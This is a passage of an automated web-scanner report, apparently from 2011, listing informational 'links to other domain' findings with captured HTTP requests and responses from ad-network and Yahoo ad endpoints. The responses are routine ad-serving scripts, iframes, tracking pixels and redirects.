<a class="inner" href="http://global.ard.yahoo.com/SIG=15ussrhc9/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=odrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313287862_68296079_as3105_imp?q=H4sIAAAAAAAAAFVQS24DIQy9is2YX8qeXUbdRskcoSqToEx3iDApiQKcoeqFS6puurFkv6f38Ve6fzvDkGxxfjGv9ehLaKv1swEGxIANWmg52DybHTAEgUQcSOu9fXM-mx3ninPN-u4NDEppKbjgHJS9pmbwj9WlJEgSe5vb2SzB-dSiDafugiS6IHDZQ7ybOftkPnMLLaZxCbdax1gfB-tqR3Jt3QOomyDBwZbcUl7NgIIE9Yt112cGjZwLBNTMzj3BZTGg1LPhOXUuwIRqQjkh_k5mu8S_spPUg5Io1BRmBkhTfjgbojex3O3pWMzNe_ey3YZ1XOvpUlIsOd7Hlvy2MzYDk5KYJtqQ6O_SCjcfP8-Kd0NoAQAA" title="Click to find out more." target="_blank">&nbsp;</a>
...[SNIP]...

15.45. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j?s=100511&u=http%3A%2F%2Fgames.frontier.com%2F&a=4&id=662812798&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=3;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMO=2

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Tue, 06 Sep 2011 12:45:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:45:56 GMT
Content-Length: 263
Connection: close

document.write('<iframe src="http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80254/;ord=2555908891" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>
...[SNIP]...

15.46. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j?s=100511&u=http%3A%2F%2Fgames.frontier.com%2Fgame.htm%3Fcode%3D119282623%26lc%3Den%26channel%3D110464377&a=4&id=80702107&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMO=2

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Tue, 06 Sep 2011 12:50:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:50:51 GMT
Content-Length: 263
Connection: close

document.write('<iframe src="http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80254/;ord=2556211177" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>
...[SNIP]...

15.47. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /j?s=100511&u=http%3A%2F%2Fgames.frontier.com%2Fgame.htm%3Fcode%3D119282623%26lc%3Den%26channel%3D110464377&a=4&id=80698544&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=3;sz=300x250;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMO=2

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Tue, 06 Sep 2011 12:50:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:50:51 GMT
Content-Length: 1276
Connection: close

document.write('<div style="width: 300; height: 250; margin: 0px; padding: 0px; overflow: hidden;"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" id="CASALE_FLASH_2556210827" width="300" height="250" style="background-color: #FFFFFF; display: block"><param name="movie" value="http://cdn.optmd.com/V2/81064/204880/CasaleMedia_300x250_Crv119-2.swf?clickTAG=http%3A%2F%2Fc.casalemedia.com%2Fc%2F4%2F1%2F81064%2FaHR0cDovL3d3dy5yZWFsYWdlLmNvbS9sYW5kaW5nL2
...[SNIP]...
<param name="bgcolor" value="#FFFFFF"><embed quality="high" wmode="transparent" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" src="http://cdn.optmd.com/V2/81064/204880/CasaleMedia_300x250_Crv119-2.swf?clickTAG=http%3A%2F%2Fc.casalemedia.com%2Fc%2F4%2F1%2F81064%2FaHR0cDovL3d3dy5yZWFsYWdlLmNvbS9sYW5kaW5nL2VudHJ5ND9jYnI9Q0FTQUxFMzE%3D" allowScriptAccess="always" loop="1" bgcolor="#FFFFFF" width="300" height="250"></embed>
...[SNIP]...

15.48. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j?s=100511&u=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D4%3Bsz%3D728x90%3Bord%3D8383746361359954%3F&a=2&id=663152446&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMO=2

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Tue, 06 Sep 2011 12:45:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:45:34 GMT
Content-Length: 178
Connection: close

document.write('<iframe src="http://cdn.optmd.com/V2/80181/197813/index.html" width="728" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>');

15.49. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j?s=100511&u=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_119282623%3Bdc_seed%3D%3Btile%3D4%3Bsz%3D728x90%3Bord%3D278143426403403.28%3F&a=2&id=81046827&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMO=2

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Tue, 06 Sep 2011 12:50:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:50:52 GMT
Content-Length: 261
Connection: close

document.write('<iframe src="http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80254/;ord=2556211545" width="728" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>
...[SNIP]...

15.50. http://as1.suitesmart.com/99917/G15493.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as1.suitesmart.com
Path:   /99917/G15493.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /99917/G15493.js?GID=15493 HTTP/1.1
Host: as1.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 17 Aug 2011 22:50:01 GMT
ETag: "50ff5-e42-4aabb50f9d840"
Accept-Ranges: bytes
Content-Length: 3650
Content-Type: application/x-javascript
Date: Tue, 06 Sep 2011 12:44:41 GMT
Connection: close
Cache-Control: no-store

var _fSet={red:{15493 : 0},map:{},tgi:null,pnp:{},pix:0};function _FGet(){var jTags=document.getElementsByTagName('script');var jTag=jTags[jTags.length-1];var isFTG=(jTag.src.match(/suitesmart.*\/[0-9
...[SNIP]...
;this.no5e=this.tP['NO5']?this.tP['NO5']:0;}function _FtG5(s,g){var o=document.createElement('DIV');o.style.width='0px';o.style.height='0px';o.display='inline';o.style.position='absolute';o.innerHTML='<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="0" HEIGHT="0" id="_f5e"> <PARAM NAME="movie" VALUE="'+s+'/_f5e.swf">
...[SNIP]...

15.51. http://autos.yahoo.com/darla/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.yahoo.com
Path:   /darla/fc.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=autos&f=2022006494&l=OEM,FIN,N,LREC,MREC&en=utf-8&npv=1&rn=1315331283021&em=%7B%22site-attribute%22%3A%22content%3D%27autosch%3D%22%26brand%3Db%26model_year%3D2011%26Make%3DBentley%26Model%3DContinental%20GTC%26price1%3D191208-219573%26price2%3D205600-236100%22%20content%3D%22Coupes%3BConvertibles%3BAll%20Cars%22%27%22%7D&t_e=1&.intl=us HTTP/1.1
Host: autos.yahoo.com
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/bentley/continental-gtc/2011/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; AutosBH=bh=W1siMjAxMTA5MDZfMDU6NDU6NDIiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9tZC5waHA_ZW49dXRmLTgiXSxbIjIwMTEwOTA2XzA1OjQ1OjQwIiwiYXV0b3MueWFob28uY29tXC9kYXJsYVwvZmMucGhwP2NiPVlBSE9PLmFkcy5kYXJsYS5fbG9hZGVkJmFtcDtwPWF1dG9zJmFtcDtmPTk2NDMyOTAwJmFtcDtsPUxSRUMmYW1wO2VuPXV0Zi04JmFtcDtucHY9MSZhbXA7cm49MTMxNTMzMTE0MDc3MyZhbXA7ZW09JTdCJTIyc2l0ZS1hdHRyaWJ1dGUlMjIlM0ElMjJjb250ZW50JTNEJTI3YXV0b3NjaCUzRCUyMiUyMiUyMGNvbnRlbnQlM0QlMjJBbGwlMjBDYXJzJTNCJTIyJTI3JTIyJTdEJmFtcDt0X2U9MSZhbXA7LmludGw9dXMiXV0-&ver=1; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:03 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: AutosBH=bh=W1siMjAxMTA5MDZfMDU6NDg6MDMiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9mYy5waHA_Y2I9WUFIT08uYWRzLmRhcmxhLl9sb2FkZWQmYW1wO3A9YXV0b3MmYW1wO2Y9MjAyMjAwNjQ5NCZhbXA7bD1PRU0sRklOLE4sTFJFQyxNUkVDJmFtcDtlbj11dGYtOCZhbXA7bnB2PTEmYW1wO3JuPTEzMTUzMzEyODMwMjEmYW1wO2VtPSU3QiUyMnNpdGUtYXR0cmlidXRlJTIyJTNBJTIyY29udGVudCUzRCUyN2F1dG9zY2glM0QlMjIlMjZicmFuZCUzRGIlMjZtb2RlbF95ZWFyJTNEMjAxMSUyNk1ha2UlM0RCZW50bGV5JTI2TW9kZWwlM0RDb250aW5lbnRhbCUyMEdUQyUyNnByaWNlMSUzRDE5MTIwOC0yMTk1NzMlMjZwcmljZTIlM0QyMDU2MDAtMjM2MTAwJTIyJTIwY29udGVudCUzRCUyMkNvdXBlcyUzQkNvbnZlcnRpYmxlcyUzQkFsbCUyMENhcnMlMjIlMjclMjIlN0QmYW1wO3RfZT0xJmFtcDsuaW50bD11cyJdLFsiMjAxMTA5MDZfMDU6NDg6MDMiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9mYy5waHA_Y2I9WUFIT08uYWRzLmRhcmxhLl9sb2FkZWQmYW1wO3A9YXV0b3MmYW1wO2Y9MjAyMjAwNjQ5NCZhbXA7bD1PRU0sRklOLE4sTFJFQyxNUkVDJmFtcDtlbj11dGYtOCZhbXA7bnB2PTEmYW1wO3JuPTEzMTUzMzEyODMwMjEmYW1wO2VtPSU3QiUyMnNpdGUtYXR0cmlidXRlJTIyJTNBJTIyY29udGVudCUzRCUyN2F1dG9zY2glM0QlMjIlMjZicmFuZCUzRGIlMjZtb2RlbF95ZWFyJTNEMjAxMSUyNk1ha2UlM0RCZW50bGV5JTI2TW9kZWwlM0RDb250aW5lbnRhbCUyMEdUQyUyNnByaWNlMSUzRDE5MTIwOC0yMTk1NzMlMjZwcmljZTIlM0QyMDU2MDAtMjM2MTAwJTIyJTIwY29udGVudCUzRCUyMkNvdXBlcyUzQkNvbnZlcnRpYmxlcyUzQkFsbCUyMENhcnMlMjIlMjclMjIlN0QmYW1wO3RfZT0xJmFtcDsuaW50bD11cyJdLFsiMjAxMTA5MDZfMDU6NDU6NDIiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9tZC5waHA_ZW49dXRmLTgiXSxbIjIwMTEwOTA2XzA1OjQ1OjQwIiwiYXV0b3MueWFob28uY29tXC9kYXJsYVwvZmMucGhwP2NiPVlBSE9PLmFkcy5kYXJsYS5fbG9hZGVkJmFtcDtwPWF1dG9zJmFtcDtmPTk2NDMyOTAwJmFtcDtsPUxSRUMmYW1wO2VuPXV0Zi04JmFtcDtucHY9MSZhbXA7cm49MTMxNTMzMTE0MDc3MyZhbXA7ZW09JTdCJTIyc2l0ZS1hdHRyaWJ1dGUlMjIlM0ElMjJjb250ZW50JTNEJTI3YXV0b3NjaCUzRCUyMiUyMiUyMGNvbnRlbnQlM0QlMjJBbGwlMjBDYXJzJTNCJTIyJTI3JTIyJTdEJmFtcDt0X2U9MSZhbXA7LmludGw9dXMiXV0-&ver=1; expires=Wed, 07-Sep-2011 00:48:03 GMT; path=/; domain=autos.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 12464

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128gpapt0(gid$5iP7EWKIR.bpARpjTl.wjRoFMhd7ak5mFoMACKWt,st$1315313283571947,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.52. http://autos.yahoo.com/darla/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.yahoo.com
Path:   /darla/fc.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=autos&f=96432900&l=LREC&en=utf-8&npv=1&rn=1315331140773&em=%7B%22site-attribute%22%3A%22content%3D%27autosch%3D%22%22%20content%3D%22All%20Cars%3B%22%27%22%7D&t_e=1&.intl=us HTTP/1.1
Host: autos.yahoo.com
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: AutosBH=bh=W1siMjAxMTA5MDZfMDU6NDY6MTIiLCJhdXRvcy55YWhvby5jb21cL2RhcmxhXC9mYy5waHA_Y2I9WUFIT08uYWRzLmRhcmxhLl9sb2FkZWQmYW1wO3A9YXV0b3MmYW1wO2Y9OTY0MzI5MDAmYW1wO2w9TFJFQyZhbXA7ZW49dXRmLTgmYW1wO25wdj0xJmFtcDtybj0xMzE1MzMxMTQwNzczJmFtcDtlbT0lN0IlMjJzaXRlLWF0dHJpYnV0ZSUyMiUzQSUyMmNvbnRlbnQlM0QlMjdhdXRvc2NoJTNEJTIyJTIyJTIwY29udGVudCUzRCUyMkFsbCUyMENhcnMlM0IlMjIlMjclMjIlN0QmYW1wO3RfZT0xJmFtcDsuaW50bD11cyJdLFsiMjAxMTA5MDZfMDU6NDY6MTAiLCJhdXRvcy55YWhvby5jb21cL2Zhdmljb24uaWNvOTFhZjYlMDAlMGQlMGFmNTRlZDVjNDEwMCJdLFsiMjAxMTA5MDZfMDU6NDY6MTAiLCJhdXRvcy55YWhvby5jb21cL2Zhdmljb24uaWNvOWEyNDklMjUwZCUyNTBhMTE1NGMwZDI4YmIiXSxbIjIwMTEwOTA2XzA1OjQ2OjEwIiwiYXV0b3MueWFob28uY29tXC9mYXZpY29uLmljbzI2ZDEyJTBkJTBhYjBjMjhjNzVkOGMiXSxbIjIwMTEwOTA2XzA1OjQ2OjEwIiwiYXV0b3MueWFob28uY29tXC8yOTFmZiUwMCUwZCUwYWZjYzg4YThhOTU2Il1d&ver=1; expires=Wed, 07-Sep-2011 00:46:12 GMT; path=/; domain=autos.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 8095

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(1283rj42a(gid$sKmKjWKIR.bpARpjTl.wjRc_Mhd7ak5mFhQABxqj,st$1315313172477916,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.53. http://beacon.dedicatednetworks.com/js/t.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.dedicatednetworks.com
Path:   /js/t.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /js/t.aspx?aid=084BF99942C00D12 HTTP/1.1
Host: beacon.dedicatednetworks.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/premier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP=\'IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\'
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:59:04 GMT
Content-Length: 211

var axel = Math.random()+"";
var a = axel * 10000000000000;
document.write('<IMG SRC="https://ad.doubleclick.net/activity;src=2736591;type=oomap527;cat=connm417;ord=1;num='+ a + '?" WIDTH=1 HEIGHT=1 BORDER=0>');

15.54. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1291642%26t%3D2 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Movers/Move.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1291642%26t%3D2
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:24:23 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 322
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1&amp;redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1291642%26t%3D2">here</A>
...[SNIP]...

15.55. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1291646%26t%3D2 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Corporate/Learn/DigitalCable/digitalcable.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1291646%26t%3D2
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:25:31 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 322
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1&amp;redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1291646%26t%3D2">here</A>
...[SNIP]...

15.56. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABiUZgAAAAAAAnhJQAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAXLsgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC-1vKFRPquCrnRbevBKa2aOyXC53U8C3Yzkg4BAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15jnbi3cd%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320284%2FL%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%2FB%3DFBSePtj8fcY-%2FJ%3D1315313084968840%2FK%3DtHb_lv57MAgihszSpmJhkw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%26_salt%3D2271271428%26cb%3D1315313084968840%26i%3D140509%26r%3D0,04162e62-d886-11e0-b0bb-78e7d1fa057c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:44:57 GMT
Content-Type: text/html; charset=UTF-8
